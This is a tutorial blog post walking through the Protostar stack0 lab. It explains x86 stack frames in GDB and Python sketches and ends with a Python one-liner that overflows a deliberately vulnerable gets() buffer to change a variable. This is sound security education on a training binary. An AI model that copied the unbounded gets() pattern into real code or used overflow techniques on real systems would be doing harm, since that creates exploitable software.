
Protostar Stack0 walkthrough
Hello there. In this tutorial we are going to learn Linux exploit development, using the Protostar Linux machine for this purpose. Protostar was developed by exploit-exercises.com. Unfortunately, the host site is now down, but you can still find the ISO file on the internet; just google it. Download it first, then boot it in VirtualBox or VMware.
Introduction to Protostar
As the first step, boot Protostar and log in as root. The default credentials are "root:godmode". After logging in as root, use ifconfig to get the IP address of the machine.
Now you can use SSH on Linux, or PuTTY, to access our victim machine. This time, log in as the normal user. The default credentials are "user:user".
There is one more thing to do before you actually start learning: change your shell to bash by entering bash, because the bash shell gives you more power than the sh shell.
Now the interesting part begins. All of the challenges are located inside "/opt/protostar/bin".
So use cd and ls:
cd /opt/protostar/bin && ls
There are 25 levels to play which can be divided into the following main categories.
- Stack-based buffer overflows
- Heap-based buffer overflows
- Format string Exploits
The easiest part to understand is the stack-based exploits. Even if you are new to exploit development, you can understand what's going on. The first level to try is stack0. It teaches you how function calls happen, how stack frames are built, and how to overflow data past the end of an allocated buffer.
Take a look at the stack0 binary
Let's see what we have to do.
./stack0
Just enter a string and see what happens.
It says to try again. :-(
user@protostar:/opt/protostar/bin$ ./stack0
hello
Try again?
We are given the source code too, although it doesn't help a lot here. Just try to get an idea of what is happening.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);   /* reads until newline, with no bounds check */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
First, it declares two variables called 'modified' and 'buffer'. The size of the buffer is 64 bytes. Then it reads a string from the user with gets and copies it into the buffer. This code doesn't do any kind of bounds checking before copying data into the buffer; it doesn't care if the supplied string is larger than the buffer. Buffer overflows occur in exactly this situation.
Did you notice something special in the declaration of the 'modified' integer? Why is there a volatile keyword? First, we assign zero to 'modified'. Nothing in this code changes it afterwards, and then there is an if-statement that checks whether it is still zero. What a joke here. :-) When the compiler sees this, it may decide that the check can never succeed and optimize the if-statement away. That's why the 'volatile' keyword is used in the code above. It tells the compiler, 'Hey GCC, don't make assumptions about this integer. It may change at run time :-)'
Disassembling the binary
Now it is time to disassemble the binary and see its inner workings. We use GDB for this. Let me introduce you to our awesome tool GDB, the GNU debugger. With a debugger we can see how things happen at the machine-code level. I have used Intel syntax for the assembly, which you can select like this.
set disassembly-flavor intel
The reason to use Intel's Assembly syntax is it's clean, user friendly, and easy to understand.
As the next step, I disassembled the main function.
(gdb) disass main
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x60
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
End of assembler dump.
There are some hexadecimal values on the left-hand side. Those are memory addresses; our assembly instructions are stored at these locations. Computer memory is divided into small units called bytes. One byte is equal to 8 bits, and 1 bit can hold zero or one, so 8 bits can hold 256 different values, ranging from 0 to 255 in decimal. Normally we work with 4-byte words.
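If you want to check the numbers for yourself, here is a tiny Python sketch. It is only arithmetic; the variable names are my own and are not part of Protostar.

```python
# How many values fit in one byte (8 bits) and in one 4-byte word (32 bits)?
BITS_PER_BYTE = 8

byte_values = 2 ** BITS_PER_BYTE      # number of distinct values in a byte
byte_max = byte_values - 1            # largest unsigned value in a byte

word_bits = 4 * BITS_PER_BYTE         # a 4-byte word is 32 bits wide
word_max = 2 ** word_bits - 1         # largest unsigned value in a word

print(byte_values, byte_max)          # 256 255
print(hex(word_max))                  # 0xffffffff
```

That is why every address and register value in the GDB output is written with 8 hexadecimal digits.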
In the CPU there are 5 main components for processing instructions.
- Data bus
- Instruction Decoder
- Program counter
- Arithmetic and logic unit (ALU)
- Registers
The program counter keeps track of which instruction should be processed next. On x86 this job is done by the EIP register, which always holds the memory address of the next instruction to execute. The CPU fetches whatever is found at that address and gives it to the instruction decoder. The instructions fetched from memory are encoded as op-codes, and each has its own meaning. The op-code for pop edi is 5f, while the op-code for inc ebp is 45. The duty of the instruction decoder is to work out what to do from these op-codes. If it sees op-code 5f, it tells the CPU 'pop the value off the top of the stack (the location ESP points to) and save it in EDI'. As the final step, the needed data comes through the data bus and is processed in the ALU. After that, the processed data is saved in memory or registers. OK, I hope you understood what's going on here.
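To make the decoding step a bit more concrete, here is a toy decoder in Python. It is only a sketch: it knows just three families of one-byte 32-bit x86 op-codes (inc, push and pop on a register), and the function name decode is my own invention, not a real tool.

```python
# Register numbers as they are encoded in one-byte x86 op-codes.
REGISTERS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def decode(opcode):
    """Turn a few one-byte 32-bit x86 op-codes into mnemonics."""
    if 0x40 <= opcode <= 0x47:                 # inc r32 is 0x40 + register
        return "inc " + REGISTERS[opcode - 0x40]
    if 0x50 <= opcode <= 0x57:                 # push r32 is 0x50 + register
        return "push " + REGISTERS[opcode - 0x50]
    if 0x58 <= opcode <= 0x5f:                 # pop r32 is 0x58 + register
        return "pop " + REGISTERS[opcode - 0x58]
    return "unknown"                           # everything else is out of scope

for op in (0x5f, 0x45, 0x55):
    print(hex(op), "->", decode(op))
# 0x5f -> pop edi
# 0x45 -> inc ebp
# 0x55 -> push ebp
```

The last one, 0x55, is the push ebp that sits at the very start of main.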
Actually, instructions like push ebp / mov ebp, esp do not come from the code of the main function. They are inserted by the compiler to build a stack frame for the function. Let me quickly introduce you to the term stack.
The stack is a concept used in computer science. In programs, we use functions to make things easy and clear. In languages like C and Python, we supply arguments to functions, and functions return data too. So how is this possible? This is where the stack comes into play. We use the stack to pass function arguments, and, as you will see, it also holds return addresses and local variables. The stack begins at a high memory address and grows toward low memory. We can add something to the stack with the push instruction and remove it with the pop instruction. The ESP register always points to the top of the stack.
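Here is a minimal Python model of that behaviour. The class name Stack and the starting address 0x1000 are made up for illustration; the only thing it tries to show is that push moves ESP down by 4 bytes and pop moves it back up.

```python
class Stack:
    """Toy model of a downward-growing stack of 4-byte words."""

    def __init__(self, esp):
        self.esp = esp            # address of the current top of the stack
        self.memory = {}          # address -> 32-bit value

    def push(self, value):
        self.esp -= 4             # the stack grows toward low memory
        self.memory[self.esp] = value

    def pop(self):
        value = self.memory.pop(self.esp)
        self.esp += 4             # popping moves ESP back up
        return value


stack = Stack(esp=0x1000)         # hypothetical starting address
stack.push(0x11111111)
stack.push(0x22222222)
print(hex(stack.esp))             # 0xff8
print(hex(stack.pop()))           # 0x22222222
print(hex(stack.esp))             # 0xffc
```

The last value pushed is the first one popped, and ESP always ends up pointing at whatever is currently on top.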
In the following code snippet, you can see I have created a breakpoint at the very first instruction of the main function. For that, I used break *0x80483f4. You may ask, 'Why didn't you use break main?' Well, if we use break main, the debugger skips the function prologue and stops at the first line of main's own code, because it knows the prologue comes from the compiler. Since we want to see how the stack frame is built, we set the breakpoint like this.
(gdb) b *0x080483f4
Breakpoint 1 at 0x80483f4: file stack0/stack0.c, line 6.
(gdb) run
Starting program: /opt/protostar/bin/stack0
Breakpoint 1, main (argc=1, argv=0xbffff864) at stack0/stack0.c:6
Next, we use the command i r to see what's inside the registers. This is the short form of info registers.
(gdb) i r
eax 0xbffff864 -1073743772
ecx 0x9b28c042 -1691828158
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7bc 0xbffff7bc
ebp 0xbffff838 0xbffff838
esi 0x0 0
edi 0x0 0
eip 0x80483f4 0x80483f4
Note that EIP is pointing to the address 0x80483f4. Do you remember it? It was the address of the first instruction in the disassembly above. EIP contains that value because the next instruction waiting to execute is there.
We have stopped execution at the very start of the function. Right now there is something on the top of the stack called ret. So what is it? It is the return address: after our function completes, the CPU has to go to that address and execute whatever instruction is found there.
We can examine the stack in GDB too. The command for examining memory is x; for example, x/x $esp shows one word at ESP in hexadecimal.
Get ready for the exploitation
What if I want to examine multiple words starting from an address? We can do it this way.
(gdb) x/30x $esp
0xbffff7bc: 0xb7eadc76 0x00000001 0xbffff864 0xbffff86c
0xbffff7cc: 0xb7fe1848 0xbffff820 0xffffffff 0xb7ffeff4
0xbffff7dc: 0x0804824b 0x00000001 0xbffff820 0xb7ff0626
0xbffff7ec: 0xb7fffab0 0xb7fe1b28 0xb7fd7ff4 0x00000000
0xbffff7fc: 0x00000000 0xbffff838 0xb17f3652 0x9b28c042
0xbffff80c: 0x00000000 0x00000000 0x00000000 0x00000001
0xbffff81c: 0x08048340 0x00000000 0xb7ff6210 0xb7eadb9b
0xbffff82c: 0xb7ffeff4 0x00000001
In the dump above, you can see the return address (0xb7eadc76) as the first word, at the address held in ESP. Remember that the top of the stack is at the low memory addresses.
The next instruction is push ebp. So, in theory, the value of the EBP register should be copied to the top of the stack after this instruction. Let's see if this is true.
(gdb) ni
0x080483f5 6 in stack0/stack0.c
(gdb) x/30x $esp
0xbffff7b8: 0xbffff838 0xb7eadc76 0x00000001 0xbffff864
0xbffff7c8: 0xbffff86c 0xb7fe1848 0xbffff820 0xffffffff
0xbffff7d8: 0xb7ffeff4 0x0804824b 0x00000001 0xbffff820
0xbffff7e8: 0xb7ff0626 0xb7fffab0 0xb7fe1b28 0xb7fd7ff4
0xbffff7f8: 0x00000000 0x00000000 0xbffff838 0xb17f3652
0xbffff808: 0x9b28c042 0x00000000 0x00000000 0x00000000
0xbffff818: 0x00000001 0x08048340 0x00000000 0xb7ff6210
0xbffff828: 0xb7eadb9b 0xb7ffeff4
You can see that a value has been copied onto the stack, and it is 0xbffff838. This is nothing but the value of EBP. :-) Another thing happened: ESP changed from 0xbffff7bc to 0xbffff7b8. Calculate the difference between them in your head; it is 4. Yes, the size of a register is 4 bytes, so ESP was reduced by 4 bytes. Wait, why is ESP reduced when we push data onto the stack? This is because the stack grows toward low memory. If something is pushed onto the stack, ESP is reduced. If we pop something off the stack, ESP goes up.
The next instruction to execute is mov ebp, esp. So the value of ESP is copied to EBP, and now both the EBP and ESP registers point to the top of the stack.
Let's see this situation in GDB.
(gdb) i r esp ebp
esp 0xbffff7b8 0xbffff7b8
ebp 0xbffff838 0xbffff838
(gdb) ni
0x080483f7 6 in stack0/stack0.c
(gdb) i r esp ebp
esp 0xbffff7b8 0xbffff7b8
ebp 0xbffff7b8 0xbffff7b8
I have used another GDB command here called ni. It is the short form of nexti (next instruction). The name says it all: it simply executes the next instruction. Also, in the output above, you can see that ESP did not change. We have not pushed or popped anything, so ESP stays at its current location.
Next, there is the instruction and esp, 0xfffffff0. It clears the lowest 4 bits of ESP, which aligns the stack to a 16-byte boundary, and we don't need to care much about it. However, ESP does change (it goes down to a lower address): here, from 0xbffff7b8 to 0xbffff7b0.
As the next instruction, there is sub esp, 0x60, so ESP is reduced by 96 bytes. Where does 96 come from? 0x60 in hex is 96 in decimal. This is how space for local variables is allocated on the stack.
We can see this in GDB too.
(gdb) i r esp
esp 0xbffff7b0 0xbffff7b0
(gdb) ni
10 in stack0/stack0.c
(gdb) i r esp
esp 0xbffff750 0xbffff750
0xbffff7b0 - 0xbffff750 = 0x60 ==> 96 Bytes in decimal .
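If you would like to replay the whole prologue without the debugger, the four instructions can be sketched in Python like this. The starting values of ESP and EBP are taken from the i r output earlier; the dictionary called memory is just my stand-in for the real stack.

```python
MASK32 = 0xffffffff            # keep every result inside 32 bits

esp = 0xbffff7bc               # ESP at main+0, from the register dump
ebp = 0xbffff838               # EBP at main+0, from the register dump
memory = {}                    # address -> value, a stand-in for the stack

# push ebp
esp = (esp - 4) & MASK32
memory[esp] = ebp

# mov ebp, esp
ebp = esp

# and esp, 0xfffffff0  (clear the low 4 bits: 16-byte alignment)
esp &= 0xfffffff0
aligned = esp

# sub esp, 0x60  (reserve 96 bytes for locals)
esp = (esp - 0x60) & MASK32

print(hex(ebp), hex(aligned), hex(esp))
# 0xbffff7b8 0xbffff7b0 0xbffff750
print(0x60)                    # 96
```

The three addresses match what GDB reported after each ni.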
OK. Let's see what's next.
mov DWORD PTR [esp + 0x5c], 0x0
This instruction takes the address esp + 0x5c and writes a zero there. 0x5c is 92 in decimal, so with ESP at 0xbffff750 the zero goes to 0xbffff7ac, which is 12 bytes below the saved EBP at 0xbffff7b8.
Can you guess what this line of code actually does? In our C source code there was an int variable that was set to zero. This is that variable. :-)
(gdb) x/30x $esp
0xbffff750: 0x00000000 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x08049620 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0xb7fd7ff4
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
(gdb) x/i $eip
0x80483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
(gdb) ni
11 in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750: 0x00000000 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x08049620 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
The next instruction is:
lea eax, [esp + 0x1c]
lea stands for Load Effective Address. It computes the address esp + 0x1c (esp + 28) and loads that address itself, not the data stored there, into EAX.
(gdb) i r eax
eax 0xbffff864 -1073743772
(gdb) x/i $eip
0x8048405 <main+17>: lea eax,[esp+0x1c]
(gdb) ni
0x08048409 11 in stack0/stack0.c
(gdb) i r eax
eax 0xbffff76c -1073744020
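The two addresses we have met so far can be double-checked with a few lines of Python. This is plain arithmetic on the ESP value from the GDB output; the names buffer_addr and modified_addr are mine.

```python
esp = 0xbffff750                    # ESP after the prologue, from GDB

buffer_addr = esp + 0x1c            # what lea eax,[esp+0x1c] puts in EAX
modified_addr = esp + 0x5c          # where mov DWORD PTR [esp+0x5c],0x0 writes

print(hex(buffer_addr))             # 0xbffff76c
print(hex(modified_addr))           # 0xbffff7ac
print(modified_addr - buffer_addr)  # 64
```

The distance of 64 bytes is exactly the size of the char buffer[64] array in the C source, so the integer sits right after the end of the buffer.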
After that, the value in EAX is written to the top of the stack by mov DWORD PTR [esp], eax. What did the two instructions above do together? They placed an address on the stack. But why? This is the argument for the next function. The next thing to do is the call to gets, and that address, the start of our buffer, is where gets will write the input data.
Let's see what happens when gets writes the input data to the buffer on the stack. I enter some As as the input string.
You can clearly see that our input is copied onto the stack.
(gdb) x/30x $esp
0xbffff750: 0xbffff76c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x08049620 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
(gdb) x/i $eip
0x804840c <main+24>: call 0x804830c <gets@plt>
(gdb) ni
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
13 in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750: 0xbffff76c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0x41414141
0xbffff770: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff780: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff790: 0x41414141 0x41414141 0x08004141 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
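One word in that dump may look strange: 0x08004141. GDB prints each 4-byte word as a number, and x86 is little-endian, so the lowest byte of the number is the first byte in memory. Here is a small Python sketch that turns the dumped words back into bytes; the list called words is copied by hand from the dump, starting at the buffer address 0xbffff76c.

```python
import struct

# Words from the dump, starting at the buffer address 0xbffff76c.
words = [0x41414141] * 11 + [0x08004141]

# "<I" packs each value as a little-endian unsigned 32-bit integer.
raw = b"".join(struct.pack("<I", w) for w in words)

print(struct.pack("<I", 0x08004141))   # b'AA\x00\x08'
print(raw.index(b"\x00"))              # 46
```

So the last word holds two more As followed by the null byte that gets writes at the end of the string, and only the 0x08 is left over from the old value. According to the dump, the terminator sits 46 bytes into the buffer.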
What if I enter a larger number of As? The input will overflow into the value stored after the buffer (the modified integer). How much data is needed to reach it? The buffer is 64 bytes and modified sits directly after it (0x5c - 0x1c = 0x40 = 64), so if I enter 65 As, the 65th A overwrites the first byte of modified.
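Before trying it on the real binary, we can model the situation in Python. This is only a simulation under my own assumptions: the frame is reduced to the 64-byte buffer followed directly by the 4-byte integer, and the function name run_stack0 is made up. It does not run the actual program.

```python
import struct

BUFFER_SIZE = 64

def run_stack0(user_input):
    """Simulate stack0: a 64-byte buffer followed by the 'modified' int."""
    frame = bytearray(BUFFER_SIZE + 4)   # all zero, so modified starts at 0
    data = user_input + b"\x00"          # gets appends a null terminator
    data = data[:len(frame)]             # this model stops at the end of modified
    frame[:len(data)] = data             # no bounds check against BUFFER_SIZE
    modified = struct.unpack_from("<i", frame, BUFFER_SIZE)[0]
    if modified != 0:
        return "you have changed the 'modified' variable"
    return "Try again?"

print(run_stack0(b"A" * 64))   # Try again?
print(run_stack0(b"A" * 65))   # you have changed the 'modified' variable
```

With exactly 64 As only the null terminator lands in the integer, and since that byte was already zero nothing changes. The 65th A is the first byte that really modifies it.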
Now everything is clear. It's time for exploitation. We can use the lovely <3 Python for this.
If I enter python -c "print '\x41' * 65" in a shell, I get 65 As printed. So I can pipe this command's output into the stack0 program like this.
user@protostar:/opt/protostar/bin$ python -c "print '\x41'*65" | ./stack0
you have changed the 'modified' variable
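The one-liner above uses the Python 2 print statement. If you prefer to keep the payload in a script, or only have Python 3 at hand, something like the following sketch should do the same job. The function name build_payload and the file name used below are my own choices, and I am assuming the script runs under Python 3.

```python
import sys

def build_payload(length=65, fill=b"A"):
    """Return `length` filler bytes plus the newline that ends gets' input."""
    return fill * length + b"\n"

if __name__ == "__main__":
    # Write raw bytes so that nothing gets re-encoded on the way out.
    sys.stdout.buffer.write(build_payload())
```

Saved as payload.py (a hypothetical name), it would be used as python3 payload.py | ./stack0.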
Awesome, we did it. We successfully modified the value. It was not just one command; we learned all the theory behind it.
Now there is one more thing. What if I enter an even larger input?
We will get a segmentation fault. The real fun begins with this part. We are going to learn more about this topic in future tutorials.
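As a small preview of why a bigger input crashes the program, we can measure how far the saved EBP and the return address are from the start of the buffer. The addresses below are taken from the GDB session above and will differ on another setup; treat this as a rough sketch, not a full explanation of the crash.

```python
buffer_addr = 0xbffff76c        # start of buffer (EAX after the lea)
saved_ebp_addr = 0xbffff7b8     # where push ebp stored the old EBP
return_addr_slot = 0xbffff7bc   # where the return address lives

print(saved_ebp_addr - buffer_addr)     # 76
print(return_addr_slot - buffer_addr)   # 80
```

So in this session an input of more than about 80 bytes starts to overwrite the return address, and when main returns the CPU is sent to an address that most likely is not valid code.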
See you again soon. Thank you for reading.

Thilan Dissanayaka
Hi, I'm Thilan from Sri Lanka, an undergraduate engineering student at the University of Ruhuna. I love to explore things about CS, hacking, reverse engineering, etc.